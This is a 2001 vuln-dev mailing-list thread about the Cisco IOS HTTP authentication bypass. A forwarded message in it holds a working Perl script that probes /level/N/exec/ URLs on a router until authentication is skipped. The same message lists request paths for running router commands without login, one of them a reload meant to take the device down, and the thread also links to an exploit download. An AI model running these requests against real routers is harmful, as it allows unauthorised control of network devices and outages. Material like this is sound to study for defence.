Re: Cisco IOS HTTP Configuration Exploit

["Brian Tan" <tanwbb () briefcase com>]

Does it mean that when i enter the URL i will not be prompted to enter the username and password??



-----Original Message-----
From:    Ertan Kurt ertank () olympos org
Sent:    Sun, 1 Jul 2001 12:52:00 +0300
To:      vuln-dev () securityfocus com
CC:      tamer () statu com tr
Subject: Fwd: Cisco IOS HTTP Configuration Exploit


Hi,

This does not work! What does this tool do really??
I tried on several vulnerable routers but your tool gave errors
at random tries between 16 and 22 (couldnt pass 22)
It just passed the vulnerable levels without saying anything.
or gave access violation errors, lol it exploits itself!!
btw, I use w2k w/sp2
As i analyzed the traffic, i saw that you just copy-pasted the same
url from the advisory and made an incremental HTTP request.
Let's check it first:
--------------------
GET /level/24/exec/.... HTTP/1.0
Host: xxx.xxx.xxx.xxx
--------------------
But you forget smtg. I think Cisco put that four dots (....) because
there can be any IOS command issued. :)
or are you trying a directory traversal attack? :)
IMHO a valid query should be like:
/level/xx/exec/- (enuff for our test)
or
/level/xx/exec/-/sh/ip/interface/brief/CR
or
/level/xx/exec/-/reload/CR
to be mean.

I provide a working code below: (my first dayz at perl so do not
bother the code)
-------begin of working code------
#!/usr/bin/perl
# modified roelof's uni.pl
# to check cisco ios http auth bug
# cronos <cronos () olympos org>
use Socket;
print "enter IP (x.x.x.x): ";
$host= <STDIN>;
chop($host);
$i=16;
$port=80;
$target = inet_aton($host);
$flag=0;
LINE: while ($i<100) { 
# ------------- Sendraw - thanx RFP rfp () wiretrip net
my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
        $line=~ tr/A-Z/a-z/;
        if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
        if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
} 
        if ($flag==1){print "Not Vulnerable with $i\n\r";}
                else {print "$line Vulnerable with $i\n\r"; last LINE; }
        $i++;
sub sendraw {
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
}
-------end of working code------

Greetz,

Ertan Kurt
Security Specialist
InfoNet Information Technologies
www.infonet.com.tr

This is a forwarded message
From: Tamer Sahin <tamer () statu com tr>
To: vuln-dev () securityfocus com
Date: Saturday, June 30, 2001, 8:10:39 PM
Subject: Cisco IOS HTTP Configuration Exploit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi geeks..

I wrote m$ based exploit cisco ios http vulnerability
(http://www.securityfocus.com/bid/2936)

Download;
http://www.tamersahin.net/downloads/cisco_ios.zip

***snip***




___________________________________________________________________________
Visit http://www.visto.com.
Find out  how companies are linking mobile users to the 
enterprise with Visto.